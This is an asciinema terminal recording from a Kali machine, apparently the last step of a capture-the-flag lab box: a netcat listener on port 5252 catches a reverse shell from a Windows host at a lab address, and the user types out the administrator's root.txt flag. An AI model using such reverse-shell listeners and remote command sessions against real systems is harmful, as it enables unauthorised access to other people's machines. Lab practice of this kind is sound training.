{"version": 2, "width": 53, "height": 11, "timestamp": 1605731183, "env": {"SHELL": "/bin/bash", "TERM": "xterm-256color"}}
[0.029064, "o", "\u001b]0;kali@kali: ~\u0007\u001b[1;34mkali@kali\u001b[00m:\u001b[1;32m~\u001b[00m$ "]
[1.821579, "o", "n"]
[1.977636, "o", "c"]
[1.984009, "o", " "]
[2.472823, "o", "-"]
[2.657881, "o", "l"]
[2.742377, "o", "v"]
[2.934348, "o", "n"]
[3.056475, "o", "p"]
[3.198007, "o", " "]
[3.753481, "o", "5"]
[4.070739, "o", "2"]
[4.239487, "o", "5"]
[4.385668, "o", "2"]
[4.639224, "o", "\r\n"]
[4.640595, "o", "listening on [any] 5252 ...\r\n"]
[7.72699, "o", "connect to [10.10.14.179] from (UNKNOWN) [10.10.10.198] 52394\r\n"]
[7.762012, "o", "Microsoft Windows [Version 10.0.17134.1610]"]
[8.008363, "o", "\r\r\n(c) 2018 Microsoft Corporation. All rights reserved.\r\r\n\r\r\nC:\\Windows\\system32>"]
[10.627043, "o", "t"]
[10.722018, "o", "y"]
[10.94724, "o", "p"]
[11.066151, "o", "e"]
[11.122334, "o", " "]
[12.243899, "o", "C"]
[12.484224, "o", ":"]
[13.020577, "o", "\\"]
[13.302122, "o", "u"]
[13.374248, "o", "s"]
[13.910764, "o", "e"]
[14.044697, "o", "r"]
[14.212816, "o", "s"]
[14.331861, "o", "\\"]
[14.572362, "o", "a"]
[14.717448, "o", "d"]
[14.820698, "o", "m"]
[14.876691, "o", "i"]
[15.036932, "o", "n"]
[15.069106, "o", "i"]
[15.156945, "o", "s"]
[15.342929, "o", "t"]
[15.469558, "o", "r"]
[15.644448, "o", "a"]
[15.836807, "o", "t"]
[15.941459, "o", "o"]
[15.98957, "o", "r"]
[16.286594, "o", "\\"]
[16.773404, "o", "d"]
[16.910393, "o", "e"]
[17.028976, "o", "s"]
[17.102478, "o", "k"]
[17.245722, "o", "t"]
[17.31004, "o", "o"]
[17.373581, "o", "p"]
[17.741373, "o", "\\"]
[18.030613, "o", "r"]
[18.149566, "o", "o"]
[18.270765, "o", "o"]
[18.351542, "o", "t"]
[18.494954, "o", "."]
[18.614989, "o", "t"]
[18.814839, "o", "x"]
[19.023466, "o", "t"]
[19.110415, "o", "\r\n"]
[19.447881, "o", "type C:\\users\\administrator\\desktop\\root.txt\r\n"]
[19.659807, "o", "8cac7c7eb8951b023ce6ba779ad7a505\r\r\n\r\r\nC:\\Windows\\system32>"]
